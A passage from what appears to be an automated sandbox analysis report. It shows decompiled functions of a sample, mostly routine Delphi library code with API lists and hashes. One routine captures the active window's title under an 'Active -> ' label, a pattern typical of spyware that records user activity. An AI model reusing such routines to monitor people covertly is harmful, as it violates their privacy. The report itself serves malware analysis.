				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00428E6C(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42a4d6);
				_push(0x49e8b0);
				L004071A0();
				return 0;
			}












                                                                                                                                                                                                                            0x0042a3e9
                                                                                                                                                                                                                            0x0042a3eb
                                                                                                                                                                                                                            0x0042a3f5
                                                                                                                                                                                                                            0x0042a404
                                                                                                                                                                                                                            0x0042a409
                                                                                                                                                                                                                            0x0042a40a
                                                                                                                                                                                                                            0x0042a40f
                                                                                                                                                                                                                            0x0042a412
                                                                                                                                                                                                                            0x0042a418
                                                                                                                                                                                                                            0x0042a41e
                                                                                                                                                                                                                            0x0042a431
                                                                                                                                                                                                                            0x0042a431
                                                                                                                                                                                                                            0x0042a439
                                                                                                                                                                                                                            0x0042a443
                                                                                                                                                                                                                            0x0042a44e
                                                                                                                                                                                                                            0x0042a44e
                                                                                                                                                                                                                            0x0042a454
                                                                                                                                                                                                                            0x0042a462
                                                                                                                                                                                                                            0x0042a467
                                                                                                                                                                                                                            0x0042a46a
                                                                                                                                                                                                                            0x0042a486
                                                                                                                                                                                                                            0x0042a48b
                                                                                                                                                                                                                            0x0042a492
                                                                                                                                                                                                                            0x0042a493
                                                                                                                                                                                                                            0x0042a498
                                                                                                                                                                                                                            0x0042a49b
                                                                                                                                                                                                                            0x0042a4a4
                                                                                                                                                                                                                            0x0042a4af
                                                                                                                                                                                                                            0x0042a4b2
                                                                                                                                                                                                                            0x0042a4b9
                                                                                                                                                                                                                            0x0042a4bc
                                                                                                                                                                                                                            0x0042a4bf
                                                                                                                                                                                                                            0x0042a4c4
                                                                                                                                                                                                                            0x0042a4c9
                                                                                                                                                                                                                            0x0042a4ce

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID: P>B
                                                                                                                                                                                                                            • API String ID: 3168844106-1256901731
                                                                                                                                                                                                                            • Opcode ID: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                                                                                                                                                                                            • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004769AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E004769AC(void* __ebx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _t28;
				intOrPtr _t32;
				void* _t37;
				intOrPtr* _t45;
				struct HWND__* _t48;
				intOrPtr _t55;
				intOrPtr _t67;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t67);
				_push(0x476a7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67;
				_t48 =  *(__edx + 4);
				if(_t48 > 0) {
					E0040500C( &_v8, GetWindowTextLengthA(_t48));
					_t28 = E00404C80(_v8) + 1;
					GetWindowTextA(_t48, E00404E80(_v8), _t28);
					_t32 =  *0x49ec6c; // 0x0
					E00408FF8(_t32,  &_v12);
					_push(_v12);
					E00408FF8(_v8,  &_v16);
					_pop(_t37);
					E00404DCC(_t37, _v16);
					if(_t28 != 0) {
						E00408FF8(_v8,  &_v20);
						if(_v20 != 0) {
							E00404A14(0x49ec6c, _v8);
							E00404CCC( &_v24, _v8, "Active -> ");
							_t45 =  *0x49ec44; // 0x0
							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x476a82);
				return E004049E4( &_v24, 5);
			}















                                                                                                                                                                                                                            0x004769b1
                                                                                                                                                                                                                            0x004769b2
                                                                                                                                                                                                                            0x004769b3
                                                                                                                                                                                                                            0x004769b4
                                                                                                                                                                                                                            0x004769b5
                                                                                                                                                                                                                            0x004769b9
                                                                                                                                                                                                                            0x004769ba
                                                                                                                                                                                                                            0x004769bf
                                                                                                                                                                                                                            0x004769c2
                                                                                                                                                                                                                            0x004769c5
                                                                                                                                                                                                                            0x004769ca
                                                                                                                                                                                                                            0x004769db
                                                                                                                                                                                                                            0x004769e8
                                                                                                                                                                                                                            0x004769f4
                                                                                                                                                                                                                            0x004769fc
                                                                                                                                                                                                                            0x00476a01
                                                                                                                                                                                                                            0x00476a09
                                                                                                                                                                                                                            0x00476a10
                                                                                                                                                                                                                            0x00476a18
                                                                                                                                                                                                                            0x00476a19
                                                                                                                                                                                                                            0x00476a1e
                                                                                                                                                                                                                            0x00476a26
                                                                                                                                                                                                                            0x00476a2f
                                                                                                                                                                                                                            0x00476a39
                                                                                                                                                                                                                            0x00476a49
                                                                                                                                                                                                                            0x00476a51
                                                                                                                                                                                                                            0x00476a5b
                                                                                                                                                                                                                            0x00476a5b
                                                                                                                                                                                                                            0x00476a2f
                                                                                                                                                                                                                            0x00476a1e
                                                                                                                                                                                                                            0x00476a62
                                                                                                                                                                                                                            0x00476a65
                                                                                                                                                                                                                            0x00476a68
                                                                                                                                                                                                                            0x00476a7a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                                                                                                                                                                                            • GetWindowTextA.USER32 ref: 004769F4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: TextWindow$Length
                                                                                                                                                                                                                            • String ID: Active ->
                                                                                                                                                                                                                            • API String ID: 1006428111-2811066380
                                                                                                                                                                                                                            • Opcode ID: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                                                                                                                                                                                            • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043B290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t31;
				void* _t36;
				intOrPtr _t42;
				struct HDC__* _t47;
				void* _t50;

				_push(__esi);
				_v16 = 0;
				_t36 = __eax;
				_push(_t50);
				_push(0x43b326);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					_t31 =  *0x49dc4c; // 0x422f30
					E00406A70(_t31,  &_v16);
					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
					E00404378();
				}
				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x43b32d);
				return E004049C0( &_v16);
			}











                                                                                                                                                                                                                            0x0043b297
                                                                                                                                                                                                                            0x0043b29a
                                                                                                                                                                                                                            0x0043b29d
                                                                                                                                                                                                                            0x0043b2a1
                                                                                                                                                                                                                            0x0043b2a2
                                                                                                                                                                                                                            0x0043b2a7
                                                                                                                                                                                                                            0x0043b2aa
                                                                                                                                                                                                                            0x0043b2b1
                                                                                                                                                                                                                            0x0043b2b6
                                                                                                                                                                                                                            0x0043b2b9
                                                                                                                                                                                                                            0x0043b2c6
                                                                                                                                                                                                                            0x0043b2cb
                                                                                                                                                                                                                            0x0043b2da
                                                                                                                                                                                                                            0x0043b2df
                                                                                                                                                                                                                            0x0043b2df
                                                                                                                                                                                                                            0x0043b2ec
                                                                                                                                                                                                                            0x0043b2f9
                                                                                                                                                                                                                            0x0043b30b
                                                                                                                                                                                                                            0x0043b312
                                                                                                                                                                                                                            0x0043b315
                                                                                                                                                                                                                            0x0043b318
                                                                                                                                                                                                                            0x0043b325

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipIntersectLoadRectStringViewport
                                                                                                                                                                                                                            • String ID: 0/B
                                                                                                                                                                                                                            • API String ID: 2734429277-1373906003
                                                                                                                                                                                                                            • Opcode ID: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                                                                                                                                                                                            • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043B338 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043B338(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E0041AC6C(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043A91C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                                                                                                                                                                            0x0043b341
                                                                                                                                                                                                                            0x0043b34e
                                                                                                                                                                                                                            0x0043b361
                                                                                                                                                                                                                            0x0043b365
                                                                                                                                                                                                                            0x0043b3b5
                                                                                                                                                                                                                            0x0043b3b5
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b371
                                                                                                                                                                                                                            0x0043b377
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b37f
                                                                                                                                                                                                                            0x0043b384
                                                                                                                                                                                                                            0x0043b398
                                                                                                                                                                                                                            0x0043b3af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b3af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b3b1
                                                                                                                                                                                                                            0x0043b3b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b3b9
                                                                                                                                                                                                                            0x0043b3c2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$EqualIntersect
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3291753422-2766056989
                                                                                                                                                                                                                            • Opcode ID: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                                                                                                                                                                                            • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047DF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                            			E0047DF40(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __esi) {
				char _v8;
				CHAR* _t9;
				intOrPtr _t10;
				CHAR* _t21;
				intOrPtr* _t28;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_t28 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x47dfd7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E0040500C(__edx, 0x105);
				if(_t38 <= 0) {
					_t9 = E00404E80( *_t28);
					_t10 =  *0x49eea8; // 0x0
					GetTempFileNameA(E00404E80(_t10), "Indy", 0, _t9);
				} else {
					_t21 = E00404E80( *_t28);
					E0047DBD4(_t38,  &_v8);
					GetTempFileNameA(E00404E80(_v8), "Indy", 0, _t21);
				}
				E00404BB8(_t28, E00404E80( *_t28));
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(0x47dfde);
				return E004049C0( &_v8);
			}











                                                                                                                                                                                                                            0x0047df43
                                                                                                                                                                                                                            0x0047df47
                                                                                                                                                                                                                            0x0047df49
                                                                                                                                                                                                                            0x0047df4d
                                                                                                                                                                                                                            0x0047df4e
                                                                                                                                                                                                                            0x0047df53
                                                                                                                                                                                                                            0x0047df56
                                                                                                                                                                                                                            0x0047df60
                                                                                                                                                                                                                            0x0047df67
                                                                                                                                                                                                                            0x0047df94
                                                                                                                                                                                                                            0x0047dfa1
                                                                                                                                                                                                                            0x0047dfac
                                                                                                                                                                                                                            0x0047df69
                                                                                                                                                                                                                            0x0047df6b
                                                                                                                                                                                                                            0x0047df7d
                                                                                                                                                                                                                            0x0047df8b
                                                                                                                                                                                                                            0x0047df8b
                                                                                                                                                                                                                            0x0047dfbc
                                                                                                                                                                                                                            0x0047dfc3
                                                                                                                                                                                                                            0x0047dfc6
                                                                                                                                                                                                                            0x0047dfc9
                                                                                                                                                                                                                            0x0047dfd6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(00000000,Indy,00000000,00000000,00000000,0047DFD7,?,?,?,00000000), ref: 0047DF8B
                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(00000000,Indy,00000000,00000000,00000000,0047DFD7,?,?,?,00000000), ref: 0047DFAC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileNameTemp
                                                                                                                                                                                                                            • String ID: Indy
                                                                                                                                                                                                                            • API String ID: 745986568-2908309946
                                                                                                                                                                                                                            • Opcode ID: 69e430025b6aa862baa62224b9fef3d972f906d16b369d55fcb03e5947137af5
                                                                                                                                                                                                                            • Instruction ID: 49c60834a58869adaa52c85b93ece72bdbff6cc483172d4f67a88a61853ae6a7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69e430025b6aa862baa62224b9fef3d972f906d16b369d55fcb03e5947137af5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC018470B142046BDB10F67ADC42B5A72ADEF84714F52447BF905EB281C67CAD04869D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042F680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t28;
				int _t32;
				intOrPtr _t35;

				_push(0);
				_t23 = __eax;
				_push(_t35);
				_push(0x42f6ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				KillTimer( *(__eax + 0x34), 1);
				_t32 =  *(_t23 + 0x30);
				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0 && SetTimer( *(_t23 + 0x34), 1, _t32, 0) == 0) {
					_t18 =  *0x49de08; // 0x422f68
					E00406A70(_t18,  &_v8);
					E0040D144(_v8, 1);
					E00404378();
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(0x42f706);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                                                            0x0042f683
                                                                                                                                                                                                                            0x0042f687
                                                                                                                                                                                                                            0x0042f68b
                                                                                                                                                                                                                            0x0042f68c
                                                                                                                                                                                                                            0x0042f691
                                                                                                                                                                                                                            0x0042f694
                                                                                                                                                                                                                            0x0042f69d
                                                                                                                                                                                                                            0x0042f6a2
                                                                                                                                                                                                                            0x0042f6a7
                                                                                                                                                                                                                            0x0042f6cb
                                                                                                                                                                                                                            0x0042f6d0
                                                                                                                                                                                                                            0x0042f6df
                                                                                                                                                                                                                            0x0042f6e4
                                                                                                                                                                                                                            0x0042f6e4
                                                                                                                                                                                                                            0x0042f6eb
                                                                                                                                                                                                                            0x0042f6ee
                                                                                                                                                                                                                            0x0042f6f1
                                                                                                                                                                                                                            0x0042f6fe

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,00000000,0042F6FF,?,?,?,00000000), ref: 0042F69D
                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,?,00000000), ref: 0042F6BF
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Timer$KillLoadString
                                                                                                                                                                                                                            • String ID: h/B
                                                                                                                                                                                                                            • API String ID: 1423459280-860576603
                                                                                                                                                                                                                            • Opcode ID: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                                                                                                                                                                                            • Instruction ID: c638335ebb45f94185b8bc64c2a04c90921daa6f7a9a6c3e75923d264c20285e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 529066ee03a2b6d127a9d6b04acc1eb89f9b5d8459c0dc1aaa59090bcc4611f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C601B571B04210ABDB10EB61DC92F5A37BCDB45708FD1007AFD00AB2D2D7B9AC44C658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C794 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x49e92b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x49e90c; // 0x42c794
					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x49e90c(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                                                                                                                                                                            0x0042c79a
                                                                                                                                                                                                                            0x0042c7a4
                                                                                                                                                                                                                            0x0042c7ce
                                                                                                                                                                                                                            0x0042c7d7
                                                                                                                                                                                                                            0x0042c7ff
                                                                                                                                                                                                                            0x0042c7ff
                                                                                                                                                                                                                            0x0042c7d9
                                                                                                                                                                                                                            0x0042c7d9
                                                                                                                                                                                                                            0x0042c7de
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c7de
                                                                                                                                                                                                                            0x0042c7a6
                                                                                                                                                                                                                            0x0042c7ab
                                                                                                                                                                                                                            0x0042c7b8
                                                                                                                                                                                                                            0x0042c7ca
                                                                                                                                                                                                                            0x0042c7ca
                                                                                                                                                                                                                            0x0042c80a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7E2
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7F4
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromPoint
                                                                                                                                                                                                                            • API String ID: 1792783759-1072306578
                                                                                                                                                                                                                            • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C66C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x49e92a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x49e908; // 0x42c66c
